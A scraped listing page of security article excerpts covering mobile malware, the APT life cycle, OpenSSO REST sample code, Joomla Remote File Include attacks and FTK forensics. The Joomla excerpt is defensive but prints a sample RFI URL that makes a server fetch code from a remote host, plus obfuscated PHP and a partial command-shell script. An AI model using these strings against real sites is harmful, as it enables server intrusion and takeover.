Trojan horses, computer viruses, spyware, keyloggers and root kits, and other malicious programs. As mobile malware is increasing at a rapid speed, the U.S. government wants users to be aware of all the dangers. So in October 2012, the FBI issued a warning about mobile malware (http://www.fbi.gov/sandiego/press-releases/2012/smartphone-users-should-be-aware-of-malware-targeting-mobile-devices-and-the-safety-measures-to-help-avoid-compromise). The IC3 has been made aware of various malware attacking Android operating systems for mobile devices. Some of the latest known versions of this type of malware are Loozfon and FinFisher. Loozfon hooks its victims by emailing the user with promising links such as: a profitable payday just for sending out email. It then plants itself onto the phone when the user clicks on this link. This specific malware will attach itself to the device and start to collect information from your device, including: Contact information E-mail address Phone numbers Phone number of the compromised device On the other hand, a spyware called FinFisher can take over various components of a smartphone. According to IC3, this malware infects the device through a text message and via a phony e-mail link. FinFisher attacks not only Android devices, but also devices running Blackberry, iOS, and Windows. Various security reports have shown that mobile malware is on the rise. Cyber criminals tend to target Android mobile devices. As a result, Android users are getting an increasing amount of destructive Trojans, mobile botnets, and SMS-sending malware and spyware. Some of these reports include: http://www.symantec.com/security_response/publications/threatreport.jsp http://pewinternet.org/Commentary/2012/February/Pew-Internet-Mobile.aspx https://www.lookout.com/resources/reports/mobile-threat-report As stated recently in a Pew survey, more than fifty percent of U.S. mobile users are overly suspicious/concerned about their personal information, and have either refused to install apps for this reason or have uninstalled apps. In other words, the IC3 says: Use the same precautions on your mobile devices as you would on your computer when using the Internet. Toll fraud Since the 1970s and 1980s, hackers have been using a process known as phreaking . This trick provides a tone that tells the phone that a control mechanism is being used to manage long-distance calls. Today, the hackers are now using a technique known as toll fraud . It's a malware that sends premium-rate SMSs from your device, incurring charges on your phone bill. Some toll fraud malware may trick you into agreeing to murky Terms of Service, while others can send premium text messages without any noticeable indicators. This is also known as premium-rate SMS malware or premium service abuser . The following figure shows how toll fraud works, portrayed by Lookout Mobile Security: According to VentureBeat, malware developers are after money. The money is in the toll fraud malware. Here is an example from http://venturebeat.com/2012/09/06/toll-fraud-lookout-mobile/: Remember commercials that say, "Text 666666 to get a new ringtone everyday!"? The normal process includes: Customer texts the number, alerting a collector—working for the ringtone provider—that he/she wants to order daily ringtones. Through the collector, the ringtone provider sends a confirmation text message to the customer (or sometimes two depending on that country's regulations) to the customer. That customer approves the charges and starts getting ringtones. The customer is billed through the wireless carrier. The wireless carrier receives payment and sends out the ringtone payment to the provider. Now, let's look at the steps when your device is infected with the malware known as FakeInst : The end user downloads a malware application that sends out an SMS message to that same ringtone provider. As normal, the ringtone provider sends the confirmation message. In this case, instead of reaching the smartphone owner, the malware blocks this message and sends a fake confirmation message before the user ever knows. The malware now places itself between the wireless carrier and the ringtone provider. Pretending to be the collector, the malware extracts the money that was paid through the user's bill. FakeInst is known to get around antivirus software by identifying itself as new or unique software. Overall, Android devices are known to be impacted more by malware than iOS. One big reason for this is that Android devices can download applications from almost any location on the Internet. Apple limits its users to downloading applications from the Apple App store. SMS spoofing The third most common type of scam is called SMS spoofing . SMS spoofing allows a person to change the original mobile phone number or the name (sender ID) where the text message comes from. It is a fairly new technology that uses SMS on mobile phones. Spoofing can be used in both lawful and unlawful ways. Impersonating a company, another person, or a product is an illegal use of spoofing. Some nations have banned it due to concerns about the potential for fraud and abuse, while others may allow it. An example of how SMS spoofing is implemented is as follows: SMS spoofing occurs when the message sender's address information has been manipulated. This is done many times to impersonate a cell phone user who is roaming on a foreign network and sending messages to a home area network. Often, these messages are addressed to users who are outside the home network, which is essentially being "hijacked" to send messages to other networks. The impacts of this activity include the following: The customer's network can receive termination charges caused by the valid delivery of these "bad" messages to interlink partners. Customers may criticize about being spammed, or their message content may be sensitive. Interlink partners can cancel the home network unless a correction of these errors is implemented. Once this is done, the phone service may be unable to send messages to these networks. There is a great risk that these messages will look like real messages, and real users can be billed for invalid roaming messages that they did not send. There is a flaw within iPhone that allows SMS spoofing. It is vulnerable to text messaging spoofing, even with the latest beta version, iOS 6. The problem with iPhone is that when the sender specifies a reply-to number this way, the recipient doesn't see the original phone number in the text message. That means there's no way to know whether a text message has been spoofed or not. This opens up the user to other spoofing types of manipulation where the recipient thinks he/she is receiving a message from a trusted source. According to pod2g (http://www.pod2g.org/2012/08/never-trust-sms-ios-text-spoofing.html): In a good implementation of this feature, the receiver would see the original phone number and the reply-to one. On iPhone, when you see the message, it seems to come from the reply-to number, and you loose track of the origin.
Read more
  • 0
  • 0
  • 4485

article-image-social-engineering-attacks
Packt
23 Dec 2013
6 min read
Save for later

Social Engineering Attacks

Packt
23 Dec 2013
6 min read
(For more resources related to this topic, see here.) Advanced Persistent Threats Advanced Persistent Threats came into existence during cyber espionage between nations. The main motive for these attacks was monetary gain and lucrative information. APTs normally target specific organization. A targeted attack is the prerequisite for APT. The targeted attack commonly exploits vulnerability of the application on the target. The attacker normally crafts a mail with malicious attachment, such as any PDF document or an executable, which is e-mailed to the individual or group of individuals .Generally, these e-mails are prepared with some social engineering element to make it lucrative to the target. The typical characteristics of APTs are as follows: Reconnaissance: The attacker motivates to get to know the target and their environment, specific users, system configurations, and so on. This type of information can be obtained from the metadata tool collector from the targeted organization document, which can be easily collected from the target organization website by using tools such as FOCA, metagoofil, libextractor, and CeWL. Time-to-live: In APTs, attackers utilize the techniques to bypass security and deploy a backdoor to make the access for longer period of time and placing a backdoor so they can always come back in case their actual presence was detected. Advance malware: Attacker utilizes the polymorphic malware in the APT. The polymorphic generally changes throughout its cycle to fool AV detection mechanism. Phishing: Most APT exploiting the target machine application is started by social engineering and spear phishing. Once the target machine is compromised or network credentials are given up, the attackers actively take steps to deploy their own tools to monitor and spread through the network as required, from machine-to-machine, and network-to-network, until they find the information they are looking for. Active Attack: In APT, there is a human element involvement. Everything is not an automatic malicious code. Famous attacks classified under APTs are as follows: Operation Aurora McRAT Hydraq Stuxnet RSA SecureID attacks The APT life cycle covers five phases, which are as follows: Phase 1: Reconnaissance Phase 2: Initial exploitation Phase 3: Establish presence and control Phase 4: Privilege escalation Phase 5: Data extraction Phase 1: Reconnaissance It's a well-known saying, "A war is half won by not only on our strength but also how much we know our enemy". The attacker generally gathers information from variety of sources as initial preparation so definitely it applies to the defendant. Information on specific people mostly higher management people who posses important information, information about specific events, setting up initial attack point and application vulnerability. So there are multiple places such as Facebook, LinkedIn, Google, and many more where the attacker tries to find the information. There are tools that generally assist Social Engineering Framework (SEF) that we have included in the book, Kali Linux Social Engineering, and another one that I suggest is Foca Meta data collector. An attack would be planned based on the information gathering. So employee awareness program must be continuously run to make employees aware that they should not to highlight themselves on the Internet and should be better prepared to defend against these attack. Phase 2: Initial exploitation A spear-phishing attack is considered one of the most advanced targeting attacks, and they are also called advance persistent threat (APT) attacks. Today, many cyber criminals use spear phishing attack to initial exploit the machine. The objective of performing spear-phishing is to gain long term access to different resources of the target for ex-government, military network, or satellite usage. The main motivation of performing such attacks is to gain access to IT environment and utilize zero day exploit found in initial information gathering phase. Why this attack is considered most dangerous because the attacker can spoof its e-mail ID by sending a malicious e-mail. There is a complete example in graphical format implementation of this has been included in the book Kali Linux Social Engineering. Phase 3: Establishing presence and control The main objective of this stage is to deploy full range of attack tools such as backdoor and rootkits to start controlling the environment and stay undetected. The organization need to take care of the outbound connection to deter such attacks because the attack tools make the outbound connection to attacker. Phase 4: Privilege escalation This is one of the key phase in the APT. Once the attacker has breached the network, the next step is to take over the privilege accounts to move the around the targeted network. So the common objective of the attacker is to obtain an administrator level credentials and stay undetected. The best approach to defend against these attacks "assume that the attackers are inside our networks right now and proceed accordingly by blocking the pathways they're travelling to access and steal our sensitive data. Phase 5: Data extraction This is the stage where the attacker has control over one or two machine in the targeted network and have obtained access credentials to supervise it's reach and identified the lucrative data. The only objective left for the attacker to start sending the data from targeted network to one of its own server or on his own machine The attacker has number of option what he can do with this data. The attacker can ask for ransom if the target does not agree to pay the amount, he can threaten to disclose the information in the public, share the zero day exploits, sell the information, or public disclosure. APT defense The defense against the APT attacks mostly based on its characteristics. The APT attacks normally bypass the Network Firewall Defense by attaching exploits within the content carried over the allowed protocol .So deep content filtering is required. In most of the APT attacks custom-developed code or targeting zero day vulnerability is used so no single IPS or antivirus signature will be able to identify the threat so must reply on less definitive indicators. The organization must ask himself what they are trying to protect and perhaps they can apply layer of data loss prevention (DEP) technology. The organization needs to monitor both inbound or outbound network preferably for both web and e-mail communication. Summary In this article, we learned what are APTs and the types of APTs. Resources for Article: Further resources on this subject: Web app penetration testing in Kali [Article] Debugging Sikuli scripts [Article] Customizing a Linux kernel [Article]
Read more
  • 0
  • 0
  • 4326
article-image-securing-our-applications-using-opensso-glassfish-security
Packt
12 May 2010
8 min read
Save for later

Securing our Applications using OpenSSO in GlassFish Security

Packt
12 May 2010
8 min read
An example of such system is integration between an online shopping system, the product provider who actually produces the goods, the insurance company that provides insurance on purchases, and finally the shipping company that delivers the goods to the consumers' hand. All of these systems access some parts of the data, which flows into the other software to perform its job in an efficient way. All the employees can benefit from a single sign-on solution, which keeps them free from having to authenticate themselves multiple times during the working day. Another example can be a travel portal, whose clients need to communicate with many other systems to plan their traveling. Integration between an in-house system and external partners can happen in different levels, from communication protocol and data format to security policies, authentication, and authorization. Because of the variety of communication models, policies, and client types that each partner may use, unifying the security model is almost impossible and the urge for some kind of integration mechanism shows itself bolder and bolder. SSO as a concept and OpenSSO as a product address this urge for integrating the systems' security together. OpenSSO provides developers with several client interfaces to interact with OpenSSO to perform authentication, authorization, session and identity management, and audition. These interfaces include Client SDK for different programming languages and using standards including: Liberty Alliance Project and Security Assertion Markup Language (SAML) for authentication and single sign-on (SSO) XML Access Control Markup Language (XACML) for authorization functions Service Provisioning Markup Language (SPML) for identity management functions. Using the client SDKs and standards mentioned above are suitable when we are developing custom solutions or integrating our system with partners, which are already using them in their security infrastructure. For any other scenario these methods are overkill for developers. To make it easier for the developers to interact with OpenSSO core services the Identity Web Services are provided. We discussed IWS briefly in OpenSSO functionalities section. The IWS are included in OpenSSO to perform the tasks included in the following table. Task Description Authentication and Single sign-on Verifying the user credentials or its authentication token. Authorization Checking the authenticated user's permissions for accessing a resource. Provisioning Creating, deleting, searching, and editing users. Logging Ability to audit and record operations. IWS are exposed in two models—the first model is the WS-* compliant SOAP-based Web Services and the second model is a very simple but elegant RESTful set of services based on HTTP and REST principles. Finally, the third way of using OpenSSO is deploying the policy agents to protect the resources available in a container. In the following section we will use RESTful interface to perform authentication, authorization, and SSO. Authenticating users by the RESTful interface Performing authentication using the RESTful Web Services interface is very simple as it is just like performing a pure HTTP communication with an HTTP server. For each type of operation there is one URL, which may have some required parameters and the output is what we can expect from that operation. The URL for authentication operation along with its parameters is as follows: Operation: Authentication Operation URL: http://host:port/OpenSSOContext/identity/authenticate Parameters: username, password, uri Output: subjectid The Operation URL specifies the address of a Servlet which will receive the required parameters, perform the operation, and write back the result. In the template included above we have the host, port, and OpenSSOContext which are things we already know. After the context we have the path to the RESTful service we want to invoke. The path includes the task type, which can be one of the tasks included in the IWS task lists table and the operation we want to invoke. All parameters are self-descriptive except the uri. We pass a URL to have our users redirected to it after the authentication is performed. This URL can include information related to the user or the original resource which the user has requested. In the case of successful authentication we will receive a subjectid, which we can use in any other RESTful operation like authorization, to log in, log out, and so on. If you remember session ID from your web development experience, subjected is the same as session ID. You can view all sessions along with related information from the OpenSSO administration console homepage under the Sessions tab. The following listing shows a sample JSP page which performs a RESTful call over OpenSSO to authenticate a user and obtain a session ID for the user if they get authenticated. <%try {String operationURL ="http://gfbook.pcname.com:8080/opensso/identity/authenticate";String username = "james";String password = "james";username = java.net.URLEncoder.encode(username, "UTF-8");password = java.net.URLEncoder.encode(password, "UTF-8");String operationString = operationURL + "?username=" +username +"&password=" + password;java.net.URL Operation = new java.net.URL(operationString);java.net.HttpURLConnection connection =(java.net.HttpURLConnection)Operation.openConnection();int responseCode = connection.getResponseCode();if (responseCode == java.net.HttpURLConnection.HTTP_OK) {java.io.BufferedReader reader = new java.io.BufferedReader(new java.io.InputStreamReader((java.io.InputStream) connection.getContent()));out.println("<h2>Subject ID</h2>");String line = reader.readLine();out.println(line);}} catch (Exception e) {e.printStackTrace();}%> REST made straightforward tasks easier than ever. Without using REST we would have dealt with complexity of SOAP and WSDL and so on but with REST you can understand the whole code with the first scan. Beginning from the top, we define the REST operation URL, which is assembled using the operation URL and appending the required parameters using the parameters name and the parameters value. The URL that we will connect to it will be something like: http://gfbook.pcname.com:8080/opensso/identity/authenticate?username=james&password=james After assembling the URL we open a network connection to authenticate it. After opening the connection we can check to see whether we received an HTTP_OK response from the server or not. Receiving the HTTP_OK means that the authentication was successful and we can read the subjectid from the socket. The connection may result in other response codes like HTTP_UNAUTHORIZED (HTTP Error code 401) when the credentials are not valid. A complete list of possible return values can be found at http://java.sun.com/javase/6/docs/api/java/net/HttpURLConnection.html. Authorizing using REST If you remember in Configuring OpenSSO for authentication and authorization section we defined a rule that was set to police http://gfbook.pcname.com:8080/ URL for us. And later on we applied the policy rule to a group of users that we created; now we want to check and see how our policy works. In every security system, before any authorization process, an authentication process should compete with a positive result. In our case the result for the authentication is subjectid, which the authorization process will use to check whether the authenticated entity is allowed to perform the action or not. The URL for the authorization operation along with its parameters is as follows: Operation: Authorization Operation URL: http://host:port/OpenSSOContext/identity/authorize Parameters: uri, action, subjectid Output: True or false based on the permission of subject over the entity and given action The combination of uri, action, and subjectid specifies that we want to check our client, identified by subjectid, permission for performing the specified action on the resource identified by the uri. The output of the service invocation is either true or false. The following listing shows how we can check whether an authenticated user has access to a certain resource or not. In the sample code we are checking james, identified by his subjectid we acquired by executing the previous code snippet, against the localhost Protector rule we defined earlier. <%try {String operationURL ="http://gfbook.pcname.com:8080/opensso/identity/authorize";String protectecUrl = " http://127.0.0.1:38080/Conversion-war/";String subjectId ="AQIC5wM2LY4SfcyemVIZX6qBGdyH7b8C5KFJjuuMbw4oj24=@AAJTSQACMDE=#";String action = "POST";protectecUrl = java.net.URLEncoder.encode(protectecUrl, "UTF-8");subjectId = java.net.URLEncoder.encode(subjectId, "UTF-8");String operationString = operationURL + "?uri=" + protectecUrl +"&action=" + action + "&subjectid=" + subjectId;java.net.URL Operation = new java.net.URL(operationString);java.net.HttpURLConnection connection =(java.net.HttpURLConnection) Operation.openConnection();int responseCode = connection.getResponseCode();if (responseCode == java.net.HttpURLConnection.HTTP_OK) {java.io.BufferedReader reader = new java.io.BufferedReader(new java.io.InputStreamReader((java.io.InputStream) connection.getContent()));out.println("<h2>authorization Result</h2>");String line = reader.readLine();out.println(line);}} catch (Exception e) {e.printStackTrace();}%> For this listing everything is the same as the authentication process in terms of initializing objects and calling methods, except that in the beginning we define the protected URL string, then we include the subjectid, which is result of our previous authentication. Later on we define the action that we need to check the permission of our authenticated user over it and finally we read the result of authorization. The complete operation after including all parameters is similar to the following snippet: http://gfbook.pcname.com:8080/opensso/identity/authorize?uri=http://127.0.0.1:38080/Conversion-war/&action=POST&subjectid=subjectId Pay attention that two subjectid elements cannot be similar even for the same user on the same machine and same OpenSSO installation. So, before running this code, make sure that you perform the authentication process and include the subjectid resulted from your authentication with the subjectid we specified previously.
Read more
  • 0
  • 0
  • 4095

article-image-preventing-remote-file-includes-attack-your-joomla-websites
Packt
15 Oct 2009
7 min read
Save for later

Preventing Remote File Includes Attack on your Joomla Websites

Packt
15 Oct 2009
7 min read
PHP is an open-source server-side scripting language. It is the basis of many web applications. It works very nicely with database platforms such as Joomla!. Since Joomla! is growing, and its popularity is increasing, malicious hackers are looking for holes. The development community has the prime responsibility to produce the most secure extensions possible. In my opinion, this comes before usability, accessibility, and so on. After all, if a beautiful extension has some glaring holes, it won't be useable. The administrators and site development folks have the next layer of responsibility to ensure that they have done everything they can to prevent attacks by checking crucial settings, patching, and monitoring logs. If these two are combined and executed properly, they will result in secure web transactions. The SQL Injections, though very nasty, can be prevented in many cases; but a RFI attack is a more difficult one to stop altogether. So, it is important that you are aware of them and know their signs. Remote File Includes An RFI vulnerability exists when an attacker can insert a script or code into a URL and command your server to execute the evil code. It is important to note that File Inclusion attacks, such as these, can mostly be mitigated by turning Register_Globals off.Turning this off ensures that the $page variable is not treated as a super-global variable, and thus does not allow an inclusion. The following is a sanitized attempt to attack a server in just such a manner: http://www.exampledomain.com/?mosConfig_absolute_path=http://www.forum.com/update/xxxxx/sys_yyyyy/i? If the site in this example did not have appropriate safeguards in place, the following code would be executed: $x0b="inx72_147x65x74"; $x0c="184rx74o154x6fwex72"; echo "c162141156kx5fr157cx6bs";if (@$x0b("222x61x33e_x6d144e") or $x0c(@$x0b("x73ax66x65_mx6fde")) == "x6fx6e"){ echo "345a146x65155od145x3ao156";}else{echo "345a146ex6dox64e:x6ffx66";}exit(); ?> This code is from a group that calls itself "Crank". The purpose of this code is not known, and therefore we do not want it to be executed on our site. This attempt to insert the code appears to want my browser to execute something and report one thing or another: {echo "345a146x65155od145x3ao156";}else{ echo "345a146ex6dox64e:x6ffx66";}exit(); Here is another example of an attempted script. This one is in PHP, and would attempt to execute in the same fashion by making an insertion on the URL: <html><head><title>/// Response CMD ///</title></head><body bgcolor=DC143C><H1>Changing this CMD will result in corrupt scanning !</H1></html></head></body><?phpif((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net start")))){echo("Safe Mode of this Server is : ");echo("SafemodeOFF");}else{ini_restore("safe_mode");ini_restore("open_basedir");if((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net start")))){echo("Safe Mode of this Server is : ");echo("SafemodeOFF");}else{echo("Safe Mode of this Server is : ");echo("SafemodeON");}}...@ob_end_clean();}elseif(@is_resource($f = @popen($cfe,"r"))){$res = "";while(!@feof($f)) { $res .= @fread($f,1024); }@pclose($f);}}return $res;}exit; This sanitized example wants to learn if we are running SAFE MODE on or off, and then would attempt to start a command shell on our server. If the attackers are successful, they will gain access to the machine and take over from there. For Windows users, a Command Shell is equivalent to running START | RUN | CMD, thus opening what we would call a "DOS prompt". Other methods of attack include the following: Evil code uploaded through session files, or through image uploads is a way of attacking. Another method of attack is the insertion or placement of code that you might think would be safe, such as compressed audio streams. These do not get inspected as they should be, and could allow access to remote resources. It is noteworthy that this can slip past even if you have set the allow_url_fopen or allow_url_include to disabled. A common method is to take input from the request POST data versus a data file. There are several other methods beyond this list. And just judging from the traffic at my sites, the list and methods change on an "irregular" basis. This highlights our need for robust security architecture, and to be very careful in accepting the user input on our websites. The Most Basic Attempt You don't always need a heavy or fancy code as in the earlier examples. Just appending a page request of sorts to the end of our URL will do it. Remember this? /?mosConfig_absolute_path=http://www.forum.com/update/xxxxx/sys_yyyyy/i? Here we're instructing the server to force our path to change in our environment to match the code located out there. Here is such a "shell": <?php$file =$_GET['evil-page'];include($file .".php");?> What Can We Do to Stop This? As stated repeatedly, in-depth defense is the most important of design considerations. Putting up many layers of defense will enable you to withstand the attacks. This type of attack can be defended against at the .htaccess level and by filtering the inputs. One problem is that we tend to forget that many defaults in PHP set up a condition for failure. Take this for instance: allow_url_fopen is on by default. "Default? Why do you care?" you may ask. This, if enabled, allows the PHP file functions such as file_get_contents(), and the ever present include and require statements to work in a manner you may not have anticipated, such as retrieving the entire contents of your website, or allowing a determined attacker to break in. Since programmers sometimes forget to do proper input filtering in their user fields, such as an input box that allows any type of data to be inputted, or code to be inserted for an injection attack. Lots of site break-ins, defacements, and worse are the result of a combination of poor programming on the coder's part, and not disabling the allow_url_fopen option. This leads to code injections as in our previous examples. Make sure you keep the Global Registers OFF. This is a biggie that will prevent much evil! There are a few ways to do this and depending on your version of Joomla!, they are handled differently. In Joomla! versions less than 1.0.13, look for this code in the globals.php // no direct accessdefined( '_VALID_MOS' ) or die( 'Restricted access' );/* * Use 1 to emulate register_globals = on * WARNING: SETTING TO 1 MAY BE REQUIRED FOR BACKWARD COMPATIBILITY * OF SOME THIRD-PARTY COMPONENTS BUT IS NOT RECOMMENDED * * Use 0 to emulate register_globals = off * NOTE: THIS IS THE RECOMMENDED SETTING FOR YOUR SITE BUT YOU MAY * EXPERIENCE PROBLEMS WITH SOME THIRD-PARTY COMPONENTS */define( 'RG_EMULATION', 0 ); Make sure the RG_EMULATION has a ZERO (0) instead of one (1). When it's installed out of the box, it is 1, meaning register_globals is set to on. In Joomla! 1.0.13 and greater (in the 1.x series), look for this field in the GLOBAL CONFIGURATION BUTTON | SERVER tab: Have you upgraded from an earlier version of Joomla!?Affects: Joomla! 1.0.13—1.0.14
Read more
  • 0
  • 0
  • 4015

article-image-processing-case
Packt
18 Mar 2014
4 min read
Save for later

Processing the Case

Packt
18 Mar 2014
4 min read
(For more resources related to this topic, see here.) Changing the time zone The correct use of the Time Zone feature is of the utmost importance for computer forensics because it might reflect the wrong MAC time of files contained in the evidence, making a professional use the wrong information in an investigation report. Based on this, you must configure the time zone to reflect the location where the evidence was acquired. For example, if you conducted the acquisition of a computer that was located in Los Angeles, US, and bring the evidence to Sao Paulo, Brazil, where your lab is situated, you should adjust the time zone to Los Angeles so that the MAC time of files can reflect the actual moment of its modification, alteration, or creation. The FTK allows you to make that time zone change at the same time that you add a new evidence to the case. Select the time zone of the evidence where it was seized from the drop-down list in the Time Zone field. This is required to add evidence in the case. Take a look at the following screenshot: You can also change the value of Time Zone after adding the evidence. In the menu toolbar, click on View and then click on Time Zone Display. Mounting compound files To locate important information during your investigation, you should expand individual compound file types. This lets you see the child files that are contained within a container, such as ZIP or RAR files. You can access this feature from the case manager's new case wizard, or from the Add Evidence or Additional Analysis dialogs. The following are some of the compound files that you can mount: E-mail files: PST, NSF, DBX, and MSG Compressed files: ZIP, RAR, GZIP, TAR, BZIP, and 7-ZIP System files: Windows thumbnails, registry, PKCS7, MS Office, and EVT If you don't mount compound files, the child files will not be located in keyword searches or filters. To expand compound files, perform the following steps: Do one of the following: For new cases, click on the Custom button in the New Case Options dialog For existing cases, go to Evidence | Additional Analysis Select Expand Compound Files. Click on Expansion Options…. In the Compound File Expansions Options dialog, select the types of files that you want to mount. Click on OK: File and folder export You may need to export part of the files or folders to help you perform some action outside of the FTK platform, or simply for the evidence presentation. To export files or folders you need to perform the following steps: Select one or more files that you would like to export. Right-click on the selection and select Export. A new dialog will open. You can configure some settings before exporting as follows: File Options: This field has advanced options to export files and folders. You can use the default options for a simple export. Items to Include: This field has the selection of files and folders that you will export. The options can be checked, listed, highlighted, or selected all together. Destination base path: This field has the folder to save the files. Take a look at the following screenshot: Column settings Columns are responsible for presenting the information property or metadata related to evidence data. By default, the FTK presents the most commonly used columns. However, you can add or remove columns to aid you in quickly finding relevant information. To manage columns in FTK, in the File List view, right-click on column bars and select Column Settings…. The number of columns available is huge. You can add or remove the columns that you need by just selecting the type and clicking on the Add button: The FTK has some templates of columns settings. You can access them by clicking on Manage and navigating to Columns | Manage Columns: You can use some ready-made templates, edit them, or create your own.
Read more
  • 0
  • 0
  • 3352
Modal Close icon
Modal Close icon